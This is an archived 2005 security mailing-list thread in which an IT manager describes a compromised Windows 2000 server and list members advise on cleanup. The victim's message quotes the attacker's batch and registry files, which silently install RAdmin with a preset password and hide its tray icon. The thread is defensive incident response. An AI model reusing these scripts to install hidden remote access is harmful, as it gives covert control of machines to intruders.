Security Basics mailing list archives
RE: Hacked
From: "Dr.Chandra" <dr.chandra () telenet be>
Date: Fri, 15 Apr 2005 13:06:05 +0200
Radmin is a known remote-administration software such as the more well known VNC. It's systray-icon is disabled by a registry hack, so actually it's running but you don't see it. AFAIK Radmin can install on a remote machine without much intervention but also AFAIK the radmin-attacker must be on the same subnet ... this however requires the 'remote registry' service to be running ... once again AFAIK, please check the radmin website for further information ... http://www.famatech.com/ Also, it is known for some time that skilled viruswriters/hackers can insert a virus into a machine wich is protected by a virusscanner without the scanner ever sending out an alert. Some virusses use such techniques to keep running stealthly others just, quite stupidly, disable the virus-scanning-engine. Check your firewall for connections on the portnumber in the PORT-registry value you mentioned earlier. Op do, 14-04-2005 te 15:19 -0400, schreef Mauricio Fernandez:
This is what I did: Detach the machine from the net, stopped explorer.exe process and ran the ServerProtect Antivirus from TrendMicro. AV found 4357 virus on .tmp files, mostly of them on Winnt\temp\ folder. Some files from the VoIP system installed on that box was infected, so I remove it and reinstalled. The content of the bat files is: Pro.bat r_server.exe /install /silence regedit /S hide.reg net start r_server start.bat @echo off r_server /pass:a1b2c3 /save hide.reg [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "DisableTrayIcon"=hex:01,00,00,00 the registry on the server has two more settings on this location for PARAMETER and PORT keys. Now, my principal concern is HOW THEY PUTT THAT THING ON MY SERVER??? The box is a w2k sp4 fully patched... Thank you very much to everybody for the help... There are two log files on the same folder, this is how they look Netfxsl.log 2005-02-10 03:06:38] [2005-02-10 03:06:38] ShadowLaunch started [2005-02-10 03:06:38] Extracting embedded exe to C:\WINNT\TEMP\SL67B.tmp [2005-02-10 03:06:38] C:\ is not running on FAT (NTFS). [2005-02-10 03:06:38] User is NT admin; preparing to shadow launch the process. [2005-02-10 03:06:38] PrepareShadowLaunch: C:\WINNT\Microsoft.NET\Framework\v1.1.4322\fusion.dll [2005-02-10 03:06:38] move C:\WINNT\Microsoft.NET\Framework\v1.1.4322\fusion.dll C:\WINNT\Microsoft.NET\Framework\v1.1.4322\SHADOW13892\_fusion.dll [2005-02-10 03:06:38] copy C:\WINNT\Microsoft.NET\Framework\v1.1.4322\SHADOW13892\_fusion.dll C:\WINNT\Microsoft.NET\Framework\v1.1.4322\fusion.dll [2005-02-10 03:06:38] PrepareShadowLaunch: C:\WINNT\Microsoft.NET\Framework\v1.1.4322\mscorjit.dll [2005-02-10 03:06:38] move C:\WINNT\Microsoft.NET\Framework\v1.1.4322\mscorjit.dll C:\WINNT\Microsoft.NET\Framework\v1.1.4322\SHADOW13892\_mscorjit.dll [2005-02-10 03:06:38] copy C:\WINNT\Microsoft.NET\Framework\v1.1.4322\SHADOW13892\_mscorjit.dll C:\WINNT\Microsoft.NET\Framework\v1.1.4322\mscorjit.dll netfxupdate.log [2005-02-10 03:07:30] START: invocation ID = 1; version = v1.1.4322; params = [2005-02-10 03:07:30] REGWRITE: value already exists: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce NetFxUpdate_v1.1.4322 [2005-02-10 03:07:30] REGDELETE: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetFxUpdate_v1.1.4322 [2005-02-10 03:07:30] INVOKE: "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\netfxupdate.exe" 2 v1.1.4322 NI NID [2005-02-10 03:07:30] START: invocation ID = 2; version = v1.1.4322; params = [2005-02-10 03:07:30] INVOKE: "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.dll" [2005-02-10 03:07:32] RETURN: 0 [2005-02-10 03:07:32] INVOKE: "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\CustomMarshalers.dll" [2005-02-10 03:07:32] RETURN: 0 [2005-02-10 03:07:32] INVOKE: "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Drawing.Design.dll" [2005-02-10 03:07:33] RETURN: 0 [2005-02-10 03:07:33] INVOKE: "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Windows.Forms.dll" [2005-02-10 03:07:34] RETURN: 0 [2005-02-10 03:07:34] INVOKE: "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Xml.dll" [2005-02-10 03:07:35] RETURN: 0 [2005-02-10 03:07:35] INVOKE: "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Design.dll" [2005-02-10 03:07:41] RETURN: 0 [2005-02-10 03:07:41] INVOKE: "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\System.Drawing.dll" [2005-02-10 03:07:42] RETURN: 0 [2005-02-10 03:07:42] INVOKE: "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\ngen.exe" /nologo /silent "C:\WINNT\Microsoft.NET\Framework\v1.1.4322\mscorlib.dll" [2005-02-10 03:07:42] RETURN: 0 Mauricio Fernández S. IT Manager Tel. 591- 445-25160 Fax. 591- 441-15056 mfernandez () fdta-valles org www.fdta-valles.org Cochabamba - Bolivia -----Original Message----- From: confi dential [mailto:arpanet.biz () gmail com] Sent: Thursday, April 14, 2005 2:39 PM To: mfernandez () fdta-valles org Cc: security-basics () securityfocus com Subject: Re: Hacked Hello Mauricio, RAdmin is used for remote administration, the attacker installed that application on your machine so he could have control over it. Remove those files and check what start.bat and pro.bat do so you could remove the application completely off your system. Also, if you haven't yet - download and install the updates from http://windowsupdate.microsoft.com/ Or Weinberger On 4/14/05, Mauricio Fernandez <mfernandez () fdta-valles org> wrote:This morning I found a wwwhack window opened on one of my w2k servers, antivirus agent was deleted (TrendMicro) and when I reinstall it back,itfound about 4500 viruses named PE_PARITE.B Now the virus is still regenerating itself creating files on winnt\temp folder, I saw the task list and stopped all the suspicious process, but the virus still goes on... The virus/hacker created a folder named RADMIN, where he copied these files: r_server.exe admdll.dll hide.reg raddrv.dll pro.bat start.bat Does anyone knows how to remove this virus and avoid this hack vulnerability? Mauricio Fernández S. IT Manager Tel. 591- 445-25160 Fax. 591- 441-15056 mfernandez () fdta-valles org www.fdta-valles.org Cochabamba - Bolivia
--------------------------------------------------------------------------- Earn your MS in Information Security ONLINE Organizations worldwide are in need of highly qualified information security professionals. Norwich University is fulfilling this demand with its MS in Information Security offered online. Recognized by the NSA as an academically excellent program, NU offers you the opportunity to earn your degree without disrupting your home or work life. http://www.msia.norwich.edu/secfocus_en ----------------------------------------------------------------------------
Current thread:
- Hacked Mauricio Fernandez (Apr 14)
- Re: Hacked Micheal Espinola Jr (Apr 14)
- Re: Hacked Alvaro Prieto (Apr 14)
- Re: Hacked Ramon Kagan (Apr 14)
- Re: Hacked confi dential (Apr 14)
- RE: Hacked Mauricio Fernandez (Apr 14)
- RE: Hacked Dr.Chandra (Apr 15)
- RE: Hacked Mauricio Fernandez (Apr 14)
- Re: Hacked Markus Pieton (Apr 14)
- Re: Hacked Jacob Bresciani (Apr 14)
- Re: Hacked Ansgar -59cobalt- Wiechers (Apr 18)
- Re: Hacked Nathaniel Hall (Apr 14)
- Re: Hacked Valentin Höbel (Apr 14)
- Re: Hacked xyberpix (Apr 14)
- Re: Hacked Alen Capalik (Apr 14)
- Re: Hacked Matan Peled (Apr 14)
- RE: Hacked lista (Apr 14)
- Re: Hacked Etapien (Apr 15)
(Thread continues...)